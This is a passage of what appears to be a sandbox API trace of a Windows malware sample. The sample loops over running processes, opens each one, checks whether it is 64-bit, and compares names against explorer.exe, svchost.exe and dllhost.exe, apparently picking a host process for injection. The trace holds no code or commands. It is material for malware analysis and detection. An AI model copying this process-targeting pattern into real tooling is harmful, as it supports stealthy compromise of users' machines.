hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0247.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0247.238] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0247.239] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.239] CloseHandle (hObject=0xd8) returned 1 [0247.239] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0247.239] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0247.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0247.239] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.239] CloseHandle (hObject=0xd8) returned 1 [0247.239] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0247.239] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0247.239] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0247.239] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0247.240] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0247.240] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.240] CloseHandle (hObject=0xd8) returned 1 [0247.241] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0247.241] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.241] CloseHandle (hObject=0xd8) returned 1 [0247.241] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0247.241] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0247.242] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.242] CloseHandle (hObject=0xd8) returned 1 [0247.242] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.242] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0247.243] CloseHandle (hObject=0xd4) returned 1 [0247.243] Sleep (dwMilliseconds=0x3e8) [0248.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0248.263] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0248.263] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0248.264] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0248.264] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0248.265] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0248.265] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0248.266] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0248.266] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0248.267] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0248.267] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0248.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0248.268] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0248.268] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0248.269] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0248.269] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0248.270] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0248.270] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0248.271] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0248.271] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0248.272] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0248.272] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.272] CloseHandle (hObject=0xd8) returned 1 [0248.272] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0248.272] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0248.272] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0248.272] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0248.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0248.273] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0248.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0248.273] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.273] CloseHandle (hObject=0xd8) returned 1 [0248.273] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0248.274] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0248.274] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0248.274] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0248.274] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0248.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0248.275] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0248.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0248.275] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.275] CloseHandle (hObject=0xd8) returned 1 [0248.275] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0248.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0248.276] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.276] CloseHandle (hObject=0xd8) returned 1 [0248.276] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0248.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0248.276] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.276] CloseHandle (hObject=0xd8) returned 1 [0248.276] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0248.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0248.277] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.277] CloseHandle (hObject=0xd8) returned 1 [0248.277] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0248.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0248.277] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.277] CloseHandle (hObject=0xd8) returned 1 [0248.277] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0248.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0248.278] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.278] CloseHandle (hObject=0xd8) returned 1 [0248.278] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0248.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0248.279] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.279] CloseHandle (hObject=0xd8) returned 1 [0248.279] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0248.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0248.279] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.279] CloseHandle (hObject=0xd8) returned 1 [0248.279] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0248.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0248.280] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.280] CloseHandle (hObject=0xd8) returned 1 [0248.280] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0248.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0248.280] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.280] CloseHandle (hObject=0xd8) returned 1 [0248.280] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0248.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0248.281] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.281] CloseHandle (hObject=0xd8) returned 1 [0248.281] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0248.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0248.281] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.281] CloseHandle (hObject=0xd8) returned 1 [0248.281] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0248.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0248.282] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.282] CloseHandle (hObject=0xd8) returned 1 [0248.282] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0248.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0248.283] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.283] CloseHandle (hObject=0xd8) returned 1 [0248.283] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0248.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0248.283] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.283] CloseHandle (hObject=0xd8) returned 1 [0248.283] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0248.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0248.284] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.284] CloseHandle (hObject=0xd8) returned 1 [0248.284] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0248.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0248.284] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.285] CloseHandle (hObject=0xd8) returned 1 [0248.285] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0248.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0248.285] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.285] CloseHandle (hObject=0xd8) returned 1 [0248.285] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0248.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0248.286] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.286] CloseHandle (hObject=0xd8) returned 1 [0248.286] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0248.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0248.286] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) 